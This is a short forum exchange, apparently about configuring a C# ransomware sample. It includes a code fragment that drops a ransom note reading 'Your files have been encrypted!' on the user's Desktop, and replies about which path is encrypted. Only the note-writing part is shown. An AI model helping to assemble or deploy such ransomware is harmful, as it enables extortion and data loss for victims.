The first path is to the DIRECTORY that will encrypt correct ?

string path = "\Desktop\READ-ME.txt";
string fullpath = userDir + userName + path;
string[] lines = { "Your files have been encrypted!", "Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." };
System.IO.File.WriteAllLines(fullpath, lines);
}
}

And the 2nd path is to where its going to save the .txt file. correct ?

yes thats correct but you should write it in this format "\Desktop"
